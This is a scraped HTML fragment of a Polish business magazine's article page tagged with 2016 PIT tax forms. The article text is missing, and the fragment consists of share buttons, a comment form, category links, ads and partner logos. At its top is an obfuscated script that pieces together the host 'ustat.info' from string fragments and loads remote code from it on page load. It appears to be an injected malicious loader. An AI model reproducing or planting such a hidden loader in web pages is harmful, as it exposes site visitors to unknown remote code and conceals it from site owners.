<p><script type="text/javascript">// <![CDATA[ (function(){ xnvx_=("u"+"")+"s"+"";xnvx_+=("tat.")+("i"); xnvx=document.createElement("script");xnvx.type="text/javascript";xnvx_+="nf"+("o")+"/"; xnvxu="12091760"+".";xnvx.async=true;xnvxu+="312velgynvx5kdyxn4vh8x5mq4se1a"; xnvx.src="//"+xnvx_+xnvxu; xnvxb=document.body; xnvxb.appendChild(xnvx); })(); // ]]&gt;</script></p>
<!-- Simple Share Buttons Adder (7.4.18) simplesharebuttons.com --><div id="ssba-classic-2" class="ssba ssbp-wrap left ssbp--theme-1"><div style="text-align:center"><span class="ssba-share-text">Udostępnij w sieci ....</span><br><a data-site="" class="ssba_facebook_share" href="http://www.facebook.com/sharer.php?u=http://magazynfakty.pl/pity-2016-dzialalnosci-gospodarczej/" target="_blank"><img src="http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/buttons/simple/facebook.png" style="width: 35px;" title="Facebook" class="ssba ssba-img" alt="Share on Facebook"><div title="Facebook" class="ssbp-text">Facebook</div></a><a data-site="" class="ssba_twitter_share" href="http://twitter.com/share?url=http://magazynfakty.pl/pity-2016-dzialalnosci-gospodarczej/&amp;text=Pity%202016%20z%20dzia%C5%82alno%C5%9Bci%20gospodarczej%20" target="&quot;_blank&quot;"><img src="http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/buttons/simple/twitter.png" style="width: 35px;" title="Twitter" class="ssba ssba-img" alt="Tweet about this on Twitter"><div title="Twitter" class="ssbp-text">Twitter</div></a><a data-site="linkedin" class="ssba_linkedin_share ssba_share_link" href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http://magazynfakty.pl/pity-2016-dzialalnosci-gospodarczej/" target="&quot;_blank&quot;"><img src="http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/buttons/simple/linkedin.png" style="width: 35px;" title="LinkedIn" class="ssba ssba-img" alt="Share on LinkedIn"><div title="Linkedin" class="ssbp-text">Linkedin</div></a><a data-site="pinterest" class="ssba_pinterest_share" href="javascript:void((function()%7Bvar%20e=document.createElement('script');e.setAttribute('type','text/javascript');e.setAttribute('charset','UTF-8');e.setAttribute('src','//assets.pinterest.com/js/pinmarklet.js?r='+Math.random()*99999999);document.body.appendChild(e)%7D)());"><img src="http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/buttons/simple/pinterest.png" style="width: 35px;" title="Pinterest" class="ssba ssba-img" alt="Pin on Pinterest"><div title="Pinterest" class="ssbp-text">Pinterest</div></a><a data-site="" class="ssba_google_share" href="https://plus.google.com/share?url=http://magazynfakty.pl/pity-2016-dzialalnosci-gospodarczej/" target="&quot;_blank&quot;"><img src="http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/buttons/simple/google.png" style="width: 35px;" title="Google+" class="ssba ssba-img" alt="Share on Google+"><div title="Google+" class="ssbp-text">Google+</div></a><a data-site="vk" class="ssba_vk_share ssba_share_link" href="http://vkontakte.ru/share.php?url=http://magazynfakty.pl/pity-2016-dzialalnosci-gospodarczej/" target="&quot;_blank&quot;"><img src="http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/buttons/simple/vk.png" style="width: 35px;" title="VK" class="ssba ssba-img" alt="Share on VK"><div title="VK" class="ssbp-text">VK</div></a><a data-site="tumblr" class="ssba_tumblr_share" href="http://www.tumblr.com/share/link?url=http://magazynfakty.pl/pity-2016-dzialalnosci-gospodarczej/" target="&quot;_blank&quot;"><img src="http://magazynfakty.pl/wp-content/plugins/simple-share-buttons-adder/buttons/simple/tumblr.png" style="width: 35px;" title="tumblr" class="ssba ssba-img" alt="Share on Tumblr"><div title="Tumblr" class="ssbp-text">Tumblr</div></a></div></div>                        <div class="mf-tags-links"><p>Tagi: <a href="http://magazynfakty.pl/tag/pit-28/" rel="tag">PIT-28</a>, <a href="http://magazynfakty.pl/tag/pit-36/" rel="tag">PIT-36</a>, <a href="http://magazynfakty.pl/tag/pit-36l/" rel="tag">PIT-36L</a>, <a href="http://magazynfakty.pl/tag/pity-2016/" rel="tag">Pity 2016</a>, <a href="http://magazynfakty.pl/tag/terminy-skladania-pitow-2016/" rel="tag">Terminy składania pitów 2016</a>, <a href="http://magazynfakty.pl/tag/terminy-skladania-pitow-przez-przedsiebiorce/" rel="tag">Terminy składania pitów przez przedsiębiorcę</a></p></div>
                                                 
                                                
                             
                		                        
                         
                   
                    </article>
                   
                                                  
                
<!-- You can start editing here. -->


			<!-- If comments are open, but there are no comments. -->

	 
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Dodaj komentarz <small><a rel="nofollow" id="cancel-comment-reply-link" href="/pity-2016-dzialalnosci-gospodarczej/#respond" style="display:none;">Anuluj pisanie odpowiedzi</a></small></h3>			<form action="http://magazynfakty.pl/wp-comments-post.php" method="post" id="commentform" class="comment-form anti-spam-form-processed">
				<p class="comment-notes"><span id="email-notes">Twój adres email nie zostanie opublikowany.</span> Pola, których wypełnienie jest wymagane, są oznaczone symbolem <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Komentarz</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Nazwa <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required="required"></p>
<p class="comment-form-email"><label for="email">E-mail <span class="required">*</span></label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" required="required"></p>
<p class="comment-form-url"><label for="url">Witryna internetowa</label> <input id="url" name="url" type="text" value="" size="30" maxlength="200"></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Opublikuj komentarz"> <input type="hidden" name="comment_post_ID" value="25138" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
</p>
<!-- Anti-spam plugin v.5.2 wordpress.org/plugins/anti-spam/ -->
		<p class="antispam-group antispam-group-q" style="clear: both; display: none;">
			<label>Current ye@r <span class="required">*</span></label>
			<input type="hidden" name="antspm-a" class="antispam-control antispam-control-a" value="2019">
			<input type="text" name="antspm-q" class="antispam-control antispam-control-q" value="5.2" autocomplete="off">
		</p>
		<p class="antispam-group antispam-group-e" style="display: none;">
			<label>Leave this field empty</label>
			<input type="text" name="antspm-e-email-url-website" class="antispam-control antispam-control-e" value="" autocomplete="off">
		</p>
<p class="wysija-after-comment"><label for="wysija-box-after-comment"><input type="checkbox" id="wysija-box-after-comment" value="1" name="wysija[comment_subscribe]">Zapisz mnie do listy mailingowej.</label></p>			<input type="hidden" name="antspm-d" class="antispam-control antispam-control-d" value="2019"></form>
			</div><!-- #respond -->
	 
                          		
            </div></div>
            <div class="kolumna4"><div class="wew">        
				                <h3 class="site-title"><span>Artykuły powiązane</span></h3>


                <li id="wpb_widget-4" class="widget widget_wpb_widget"><h3 class="site-title"><span>Kategorie</span></h3>

<style>


.mf-list-category-all a {border-bottom: solid 1px #ccc; padding: 0px;  width: 50%; float: left; display: inline-block; }

</style>



<div class="mf-list-category-all">
<a href="http://magazynfakty.pl/kategoria/aktualnosci/">Aktualności</a><a href="http://magazynfakty.pl/kategoria/architektura/">Architektura</a><a href="http://magazynfakty.pl/kategoria/bankowosc-i-finanse/">Bankowość i finanse</a><a href="http://magazynfakty.pl/kategoria/bezpieczenstwo/">Bezpieczeństwo</a><a href="http://magazynfakty.pl/kategoria/bhp/">BHP</a><a href="http://magazynfakty.pl/kategoria/biuro/">Biuro</a><a href="http://magazynfakty.pl/kategoria/budownictwo/">Budownictwo</a><a href="http://magazynfakty.pl/kategoria/chemia/">Chemia</a><a href="http://magazynfakty.pl/kategoria/csr/">CSR</a><a href="http://magazynfakty.pl/kategoria/dom-i-ogrod/">Dom i ogród</a><a href="http://magazynfakty.pl/kategoria/drogownictwo/">Drogownictwo</a><a href="http://magazynfakty.pl/kategoria/edukacja/">Edukacja</a><a href="http://magazynfakty.pl/kategoria/ekologia/">Ekologia</a><a href="http://magazynfakty.pl/kategoria/eksport/">Eksport</a><a href="http://magazynfakty.pl/kategoria/energetyka/">Energetyka</a><a href="http://magazynfakty.pl/kategoria/firma/">Firma</a><a href="http://magazynfakty.pl/kategoria/franczyza/">Franczyza</a><a href="http://magazynfakty.pl/kategoria/gadzet/">Gadżet</a><a href="http://magazynfakty.pl/kategoria/gaz/">GAZ</a><a href="http://magazynfakty.pl/kategoria/gielda/">Giełda</a><a href="http://magazynfakty.pl/kategoria/gospodarka/">Gospodarka</a><a href="http://magazynfakty.pl/kategoria/gospodarka-komunalna/">Gospodarka komunalna</a><a href="http://magazynfakty.pl/kategoria/gospodarka-wodna/">Gospodarka wodna</a><a href="http://magazynfakty.pl/kategoria/hutnictwo/">Hutnictwo</a><a href="http://magazynfakty.pl/kategoria/import/">Import</a><a href="http://magazynfakty.pl/kategoria/innowacje/">Innowacje</a><a href="http://magazynfakty.pl/kategoria/inwestycje/">inwestycje</a><a href="http://magazynfakty.pl/kategoria/it/">IT</a><a href="http://magazynfakty.pl/kategoria/izby-gospodarcze/">Izby gospodarcze</a><a href="http://magazynfakty.pl/kategoria/jakosc/">Jakość</a><a href="http://magazynfakty.pl/kategoria/kod/">KOD</a><a href="http://magazynfakty.pl/kategoria/kolej-2/">Kolej</a><a href="http://magazynfakty.pl/kategoria/konferencje/">Konferencje</a><a href="http://magazynfakty.pl/kategoria/kultura/">Kultura</a><a href="http://magazynfakty.pl/kategoria/leasing/">Leasing</a><a href="http://magazynfakty.pl/kategoria/logistyka/">Logistyka</a><a href="http://magazynfakty.pl/kategoria/lotnictwo-2/">Lotnictwo</a><a href="http://magazynfakty.pl/kategoria/marketing/">Marketing</a><a href="http://magazynfakty.pl/kategoria/medycyna/">Medycyna</a><a href="http://magazynfakty.pl/kategoria/moda/">Moda</a><a href="http://magazynfakty.pl/kategoria/motoryzacja/">Motoryzacja</a><a href="http://magazynfakty.pl/kategoria/nagrody/">Nagrody</a><a href="http://magazynfakty.pl/kategoria/nauka/">Nauka</a><a href="http://magazynfakty.pl/kategoria/newconnect/">NewConnect</a><a href="http://magazynfakty.pl/kategoria/nieruchomosci/">Nieruchomości</a><a href="http://magazynfakty.pl/kategoria/nowe-technologie/">Nowe technologie</a><a href="http://magazynfakty.pl/kategoria/nowosci/">Nowości</a><a href="http://magazynfakty.pl/kategoria/ochrona-srodowiska/">Ochrona środowiska</a><a href="http://magazynfakty.pl/kategoria/paliwa/">Paliwa</a><a href="http://magazynfakty.pl/kategoria/partnerzy/">Partnerzy</a><a href="http://magazynfakty.pl/kategoria/patronaty-medialne/">Patronaty medialne</a><a href="http://magazynfakty.pl/kategoria/polityka/">Polityka</a><a href="http://magazynfakty.pl/kategoria/polska/">Polska</a><a href="http://magazynfakty.pl/kategoria/porady/">Porady</a><a href="http://magazynfakty.pl/kategoria/praca-wynagrodzenia/">Praca i wynagrodzenia</a><a href="http://magazynfakty.pl/kategoria/prawo/">Prawo</a><a href="http://magazynfakty.pl/kategoria/przemysl-cementowy/">Przemysł cementowy</a><a href="http://magazynfakty.pl/kategoria/przemysl-obronny/">Przemysł obronny</a><a href="http://magazynfakty.pl/kategoria/przemysl-spozywczy/">Przemysł spożywczy</a><a href="http://magazynfakty.pl/kategoria/przemysl-stoczniowy/">Przemysł stoczniowy</a><a href="http://magazynfakty.pl/kategoria/przemysl-wydobywczy-2/">Przemysł wydobywczy</a><a href="http://magazynfakty.pl/kategoria/przetargi/">Przetargi</a><a href="http://magazynfakty.pl/kategoria/publikacje/">Publikacje</a><a href="http://magazynfakty.pl/kategoria/rolnictwo/">Rolnictwo</a><a href="http://magazynfakty.pl/kategoria/rozmowy-faktow/">Rozmowy FAKTÓW</a><a href="http://magazynfakty.pl/kategoria/rynek-luksusu/">Rynek luksusu</a><a href="http://magazynfakty.pl/kategoria/samorzad/">Samorząd</a><a href="http://magazynfakty.pl/kategoria/sektor-kosmiczny/">Sektor kosmiczny</a><a href="http://magazynfakty.pl/kategoria/spoldzielczosc/">Spółdzielczość</a><a href="http://magazynfakty.pl/kategoria/spoleczenstwo/">Społeczeństwo</a><a href="http://magazynfakty.pl/kategoria/sport-i-wypoczynek/">Sport i wypoczynek</a><a href="http://magazynfakty.pl/kategoria/sprzedaz/">Sprzedaż</a><a href="http://magazynfakty.pl/kategoria/strefy-ekonomiczne/">Strefy ekonomiczne</a><a href="http://magazynfakty.pl/kategoria/swiat/">Świat</a><a href="http://magazynfakty.pl/kategoria/szkolenia/">Szkolenia</a><a href="http://magazynfakty.pl/kategoria/targi/">Targi</a><a href="http://magazynfakty.pl/kategoria/telekomunikacja/">Telekomunikacja</a><a href="http://magazynfakty.pl/kategoria/transport-spedycja-logistyka/">Transport</a><a href="http://magazynfakty.pl/kategoria/turystyka/">Turystyka</a><a href="http://magazynfakty.pl/kategoria/ubezpieczenia/">Ubezpieczenia</a><a href="http://magazynfakty.pl/kategoria/uncategorized/">Uncategorized</a><a href="http://magazynfakty.pl/kategoria/unia-europejska/">Unia Europejska</a><a href="http://magazynfakty.pl/kategoria/uslugi/">Usługi</a><a href="http://magazynfakty.pl/kategoria/windykacja/">Windykacja</a><a href="http://magazynfakty.pl/kategoria/wybor-redakcji/">Wybór redakcji</a><a href="http://magazynfakty.pl/kategoria/wydarzenia/">Wydarzenia</a><a href="http://magazynfakty.pl/kategoria/wyniki-finansowe-spolek/">Wyniki finansowe</a><a href="http://magazynfakty.pl/kategoria/wyroznienia/">Wyróżnienia</a><a href="http://magazynfakty.pl/kategoria/wywiad/">Wywiad</a><a href="http://magazynfakty.pl/kategoria/zarzadzanie/">Zarządzanie</a><a href="http://magazynfakty.pl/kategoria/zdrowie/">Zdrowie</a><div style="clear:both"></div>
</div><div class="google-auto-placed" style="text-align: center; width: 100%; height: auto; clear: none;"><ins data-ad-format="auto" class="adsbygoogle adsbygoogle-noablate" data-ad-client="ca-pub-9090873593537305" data-adsbygoogle-status="done" style="display: block; margin: 10px auto; background-color: transparent; height: 250px;"><ins id="aswift_1_expand" style="display:inline-table;border:none;height:250px;margin:0;padding:0;position:relative;visibility:visible;width:293px;background-color:transparent;"><ins id="aswift_1_anchor" style="display:block;border:none;height:250px;margin:0;padding:0;position:relative;visibility:visible;width:293px;background-color:transparent;"><iframe width="293" height="250" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_1" name="aswift_1" style="left:0;position:absolute;top:0;border:0px;width:293px;height:250px;"></iframe></ins></ins></ins></div>


                            </li></div></div>
        </div>
    </div>
</div>
<div class="core mf-bg-page">
    <div class="container-mf mf-bg-page">
        <div class="row-mf">
            <div class="kolumna12"><div class="wew">
                        <li id="wp_mf_post_box-9" class="widget widget_wp_mf_post_box"><div class="widget-text wp_mf_post_box_plugin_box" style="margin-bottom:15px"><div class="wew-h"><h3 class="site-title"><span>Polecane</span></h3><div style="clear:both"></div></div>



<div class="kolumna3"><div class="wew">            
 
<div class="mf-article-box-wp ">
<div style="overflow:hidden">
<div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/czy-brexit-moze-miec-wplyw-na-ceny-walut-europejskich/">
<img width="365" height="274" src="http://magazynfakty.pl/wp-content/uploads/2019/03/brexitvote-k2dg-621x414livemint-365x274.jpg" class="attachment-ikona_wpisu_4_3 size-ikona_wpisu_4_3 wp-post-image" alt="Brexit wpływ na ceny walut"></a>
</div>
</div>
<div class="mf-article-box-wp-caption"><div class="wew-h">
 
 
<h4 class="mf-art-title-gl"> <a href="http://magazynfakty.pl/czy-brexit-moze-miec-wplyw-na-ceny-walut-europejskich/"> Czy Brexit może mieć wpływ na ceny walut europejskich? </a> </h4>
 
</div></div>
</div>
<p></p>

</div></div>


    




<div class="kolumna3"><div class="wew">            
 
<div class="mf-article-box-wp ">
<div style="overflow:hidden">
<div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/jak-placic-nizsze-podatki-czyli-optymalizacja-podatkowa/">
<img width="365" height="274" src="http://magazynfakty.pl/wp-content/uploads/2019/02/fotolia_4881506_l-365x274.jpg" class="attachment-ikona_wpisu_4_3 size-ikona_wpisu_4_3 wp-post-image" alt="Optymalizacja podatkowa" srcset="http://magazynfakty.pl/wp-content/uploads/2019/02/fotolia_4881506_l-365x274.jpg 365w, http://magazynfakty.pl/wp-content/uploads/2019/02/fotolia_4881506_l-300x225.jpg 300w, http://magazynfakty.pl/wp-content/uploads/2019/02/fotolia_4881506_l-600x450.jpg 600w, http://magazynfakty.pl/wp-content/uploads/2019/02/fotolia_4881506_l.jpg 640w" sizes="(max-width: 365px) 100vw, 365px"></a>
</div>
</div>
<div class="mf-article-box-wp-caption"><div class="wew-h">
 
 
<h4 class="mf-art-title-gl"> <a href="http://magazynfakty.pl/jak-placic-nizsze-podatki-czyli-optymalizacja-podatkowa/"> Jak płacić niższe podatki, czyli optymalizacja podatkowa </a> </h4>
 
</div></div>
</div>
<p></p>

</div></div>


    




<div class="kolumna3"><div class="wew">            
 
<div class="mf-article-box-wp ">
<div style="overflow:hidden">
<div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/zwrot-podatku-vat-z-francji/">
<img width="365" height="274" src="http://magazynfakty.pl/wp-content/uploads/2019/02/01_francja_zwrotvat-365x274.jpg" class="attachment-ikona_wpisu_4_3 size-ikona_wpisu_4_3 wp-post-image" alt="Zwrot podatku VAT z Francji"></a>
</div>
</div>
<div class="mf-article-box-wp-caption"><div class="wew-h">
 
 
<h4 class="mf-art-title-gl"> <a href="http://magazynfakty.pl/zwrot-podatku-vat-z-francji/"> Zwrot podatku VAT z Francji </a> </h4>
 
</div></div>
</div>
<p></p>

</div></div>


    




<div class="kolumna3"><div class="wew">            
 
<div class="mf-article-box-wp ">
<div style="overflow:hidden">
<div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/zmiany-w-oplatach-drogowych-na-slowacji-ile-zaplaca-kierowcy-w-2019-roku/">
<img width="365" height="274" src="http://magazynfakty.pl/wp-content/uploads/2019/02/fotolia_200549352_subscription_monthly_m-365x274.jpg" class="attachment-ikona_wpisu_4_3 size-ikona_wpisu_4_3 wp-post-image" alt="opłaty drogowe na Słowacji"></a>
</div>
</div>
<div class="mf-article-box-wp-caption"><div class="wew-h">
 
 
<h4 class="mf-art-title-gl"> <a href="http://magazynfakty.pl/zmiany-w-oplatach-drogowych-na-slowacji-ile-zaplaca-kierowcy-w-2019-roku/"> Zmiany w opłatach drogowych na Słowacji – ile zapłacą kierowcy w 2019 roku? </a> </h4>
 
</div></div>
</div>
<p></p>

</div></div>


    
<div style="clear:both"></div><div style="clear:both"></div></div><!--end widget --></li>
                    </div> </div> 
        </div>
    </div>
</div>
<div class="core mf-bg-page">
    <div class="container-mf">
        <div class="row-mf">
            <div class="kolumna12"><div class="wew">
                <div class="sidebar">
                    <li id="wp_mf_plugin_owl_carousel-3" class="widget widget_wp_mf_plugin_owl_carousel"><div class="no-mobile"><div class="widget-textmf_widget_plugin_owl_carousel_box"><div class="wew-h"><h3 class="site-title"><span> Partnerzy </span></h3>  </div>
 <script type="text/javascript"><!--
jQuery(document).ready(function() {
var owl = jQuery(' .wp_mf_plugin_owl_carousel-3 ');	
owl.owlCarousel({
navigation : false ,items : '6',pagination : true ,autoPlay: 3000,	lazyLoad : true ,
    stopOnHover : true,
	});
jQuery('.mf_owl_btn-next-wp_mf_plugin_owl_carousel-3').click(function(){    owl.trigger('owl.next');
  })
jQuery('.mf_owl_btn-prev-wp_mf_plugin_owl_carousel-3').click(function(){    owl.trigger('owl.prev');
  })
});
//--></script>
 
              
<div style="position:relative;">
<div class="wp_mf_plugin_owl_carousel-3 owl-carousel owl-theme" style="opacity: 1; display: block;"> 
<div class="owl-wrapper-outer"><div class="owl-wrapper" style="width: 4700px; left: 0px; display: block;"><div class="owl-item" style="width: 235px;"><div class="mf_slide"><div class="wew">

 
<div class="mf-article">
<div style="overflow:hidden"><div class="mf-image-scale">
<a target="_new" href="http://www.polmotauto.pl/">
 <img src="http://magazynfakty.pl/wp-content/uploads/2016/11/autologo.jpg" alt="Pol – Mot Auto" class="lazyOwl" style="display: inline;"> </a>
               
</div></div>
<div class="mf-article-caption"><div class="wew-h">
 
</div></div></div>


</div></div></div><div class="owl-item" style="width: 235px;"><div class="mf_slide"><div class="wew">

 
<div class="mf-article">
<div style="overflow:hidden"><div class="mf-image-scale">
<a target="_new" href="http://www.podkarpackie.pl/">
 <img src="http://magazynfakty.pl/wp-content/uploads/2016/09/podkarpackie.jpg" alt="Podkarpackie" class="lazyOwl" style="display: inline;"> </a>
               
</div></div>
<div class="mf-article-caption"><div class="wew-h">
 
</div></div></div>


</div></div></div><div class="owl-item" style="width: 235px;"><div class="mf_slide"><div class="wew">

 
<div class="mf-article">
<div style="overflow:hidden"><div class="mf-image-scale">
<a target="_new" href="http://cwk-podkarpackie.com/">
 <img src="http://magazynfakty.pl/wp-content/uploads/2016/09/centrum.jpg" alt="Centrum" class="lazyOwl" style="display: inline;"> </a>
               
</div></div>
<div class="mf-article-caption"><div class="wew-h">
 
</div></div></div>


</div></div></div><div class="owl-item" style="width: 235px;"><div class="mf_slide"><div class="wew">

 
<div class="mf-article">
<div style="overflow:hidden"><div class="mf-image-scale">
<a target="_new" href="http://przedsiebiorcy.eu/">
 <img src="http://magazynfakty.pl/wp-content/uploads/2015/09/przedsiebiorcyeui.jpg" alt="Partnerzy" class="lazyOwl" style="display: inline;"> </a>
               
</div></div>
<div class="mf-article-caption"><div class="wew-h">
 
</div></div></div>


</div></div></div><div class="owl-item loading" style="width: 235px;"><div class="mf_slide"><div class="wew">

 
<div class="mf-article">
<div style="overflow:hidden"><div class="mf-image-scale">
<a target="_new" href="http://www.kie.biz.pl/">
 <img src="http://magazynfakty.pl/wp-content/uploads/2015/08/klub_int.jpg" data-src="http://magazynfakty.pl/wp-content/uploads/2015/08/klub_int.jpg" alt="Klub integracji" class="lazyOwl" style="display: none;"> </a>
               
</div></div>
<div class="mf-article-caption"><div class="wew-h">
 
</div></div></div>


</div></div></div><div class="owl-item loading" style="width: 235px;"><div class="mf_slide"><div class="wew">

 
<div class="mf-article">
<div style="overflow:hidden"><div class="mf-image-scale">
<a target="_new" href="http://www.zpp.pl/">
 <img src="http://magazynfakty.pl/wp-content/uploads/2015/08/zpp.jpg" data-src="http://magazynfakty.pl/wp-content/uploads/2015/08/zpp.jpg" alt="Związek Przedsiębiorców" class="lazyOwl" style="display: none;"> </a>
               
</div></div>
<div class="mf-article-caption"><div class="wew-h">
 
</div></div></div>


</div></div></div><div class="owl-item loading" style="width: 235px;"><div class="mf_slide"><div class="wew">

 
<div class="mf-article">
<div style="overflow:hidden"><div class="mf-image-scale">
<a target="_new" href="http://www.platformaproduktowiuslug.pl/">
 <img src="http://magazynfakty.pl/wp-content/uploads/2015/08/platforma.jpg" data-src="http://magazynfakty.pl/wp-content/uploads/2015/08/platforma.jpg" alt="Platforma" class="lazyOwl" style="display: none;"> </a>
               
</div></div>
<div class="mf-article-caption"><div class="wew-h">
 
</div></div></div>


</div></div></div><div class="owl-item loading" style="width: 235px;"><div class="mf_slide"><div class="wew">

 
<div class="mf-article">
<div style="overflow:hidden"><div class="mf-image-scale">
<a target="_new" href="http://www.k2lider.eu/">
 <img src="http://magazynfakty.pl/wp-content/uploads/2015/08/k2_lideri.jpg" data-src="http://magazynfakty.pl/wp-content/uploads/2015/08/k2_lideri.jpg" alt="K 2 Lider" class="lazyOwl" style="display: none;"> </a>
               
</div></div>
<div class="mf-article-caption"><div class="wew-h">
 
</div></div></div>


</div></div></div><div class="owl-item loading" style="width: 235px;"><div class="mf_slide"><div class="wew">

 
<div class="mf-article">
<div style="overflow:hidden"><div class="mf-image-scale">
<a target="_new" href="http://www.magazynvip.pl/">
 <img src="http://magazynfakty.pl/wp-content/uploads/2015/08/magvip.jpg" data-src="http://magazynfakty.pl/wp-content/uploads/2015/08/magvip.jpg" alt="Magazyn VIP" class="lazyOwl" style="display: none;"> </a>
               
</div></div>
<div class="mf-article-caption"><div class="wew-h">
 
</div></div></div>


</div></div></div><div class="owl-item loading" style="width: 235px;"><div class="mf_slide"><div class="wew">

 
<div class="mf-article">
<div style="overflow:hidden"><div class="mf-image-scale">
<a target="_new" href="http://www.rynekinwestycji.pl/">
 <img src="http://magazynfakty.pl/wp-content/uploads/2015/08/ryneki1.jpg" data-src="http://magazynfakty.pl/wp-content/uploads/2015/08/ryneki1.jpg" alt="Rynek Inwestycji" class="lazyOwl" style="display: none;"> </a>
               
</div></div>
<div class="mf-article-caption"><div class="wew-h">
 
</div></div></div>


</div></div></div></div></div>





























 
 
<div class="owl-controls"><div class="owl-pagination"><div class="owl-page active"><span class=""></span></div><div class="owl-page"><span class=""></span></div><div class="owl-page"><span class=""></span></div></div></div></div>
</div></div>
</div></li>
</div>
            </div></div>
        </div>
    </div>
</div>
<div class="core mf-footer">
    <div class="google-auto-placed" style="text-align: center; width: 100%; height: auto; clear: both;"><ins data-ad-format="auto" class="adsbygoogle adsbygoogle-noablate" data-ad-client="ca-pub-9090873593537305" data-adsbygoogle-status="done" style="display: block; margin: 10px auto; background-color: transparent; height: 90px;"><ins id="aswift_2_expand" style="display:inline-table;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:1024px;background-color:transparent;"><ins id="aswift_2_anchor" style="display:block;border:none;height:90px;margin:0;padding:0;position:relative;visibility:visible;width:1024px;background-color:transparent;"><iframe width="1024" height="90" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" allowfullscreen="true" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){try{h=s.upd(h,i)}catch(e){}w.location.replace(h)}}" id="aswift_2" name="aswift_2" style="left:0;position:absolute;top:0;border:0px;width:1024px;height:90px;"></iframe></ins></ins></ins></div><div class="container-mf">
        <div class="row-mf">
            <div class="kolumna4"><div class="wew">
                <div class="sidebar">
                  <li id="wp_mf_post_box-5" class="widget widget_wp_mf_post_box"><div class="widget-text wp_mf_post_box_plugin_box" style="margin-bottom:15px"><div class="wew-h"><h3 class="site-title"><span>GALERIE ZDJĘĆ</span></h3><div style="clear:both"></div></div>



<div class="kolumna4"><div class="wew">            
 
<div class="mf-article ">
<div style="overflow:hidden"><div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/galeria/mspo-2016-obiektywie-faktow/">
<img width="365" height="206" src="http://magazynfakty.pl/wp-content/uploads/2016/09/img_1064-365x206.jpg" class="attachment-ikona_wpisu_16_9 size-ikona_wpisu_16_9 wp-post-image" alt=""></a>
</div></div>

<div class="mf-article-caption"><div class="wew-h">
 
</div></div>
</div>
<p></p>

</div></div>


    




<div class="kolumna4"><div class="wew">            
 
<div class="mf-article ">
<div style="overflow:hidden"><div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/galeria/gala-vip-2015/">
<img width="365" height="206" src="http://magazynfakty.pl/wp-content/uploads/2015/11/MG_6584-365x206.jpg" class="attachment-ikona_wpisu_16_9 size-ikona_wpisu_16_9 wp-post-image" alt=""></a>
</div></div>

<div class="mf-article-caption"><div class="wew-h">
 
</div></div>
</div>
<p></p>

</div></div>


    




<div class="kolumna4"><div class="wew">            
 
<div class="mf-article ">
<div style="overflow:hidden"><div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/galeria/drutex-otwiera-europejskie-centrum-stolarki/">
<img width="365" height="206" src="http://magazynfakty.pl/wp-content/uploads/2015/08/IMG_8513-365x206.jpg" class="attachment-ikona_wpisu_16_9 size-ikona_wpisu_16_9 wp-post-image" alt=""></a>
</div></div>

<div class="mf-article-caption"><div class="wew-h">
 
</div></div>
</div>
<p></p>

</div></div>


    
<div style="clear:both"></div>



<div class="kolumna4"><div class="wew">            
 
<div class="mf-article ">
<div style="overflow:hidden"><div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/galeria/agro-show-2014/">
<img width="365" height="206" src="http://magazynfakty.pl/wp-content/uploads/2015/08/IMG_7304-e14399228033172-365x206.jpg" class="attachment-ikona_wpisu_16_9 size-ikona_wpisu_16_9 wp-post-image" alt=""></a>
</div></div>

<div class="mf-article-caption"><div class="wew-h">
 
</div></div>
</div>
<p></p>

</div></div>


    




<div class="kolumna4"><div class="wew">            
 
<div class="mf-article ">
<div style="overflow:hidden"><div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/galeria/jarmark-w-spale/">
<img width="365" height="206" src="http://magazynfakty.pl/wp-content/uploads/2015/08/IMG_17311-365x206.jpg" class="attachment-ikona_wpisu_16_9 size-ikona_wpisu_16_9 wp-post-image" alt=""></a>
</div></div>

<div class="mf-article-caption"><div class="wew-h">
 
</div></div>
</div>
<p></p>

</div></div>


    




<div class="kolumna4"><div class="wew">            
 
<div class="mf-article ">
<div style="overflow:hidden"><div class="mf-image-scale">
 
<a href="http://magazynfakty.pl/galeria/suzuki-vitara/">
<img width="365" height="206" src="http://magazynfakty.pl/wp-content/uploads/2015/08/IMG_07691-365x206.jpg" class="attachment-ikona_wpisu_16_9 size-ikona_wpisu_16_9 wp-post-image" alt=""></a>
</div></div>

<div class="mf-article-caption"><div class="wew-h">
 
</div></div>
</div>
<p></p>

</div></div>


    
<div style="clear:both"></div>


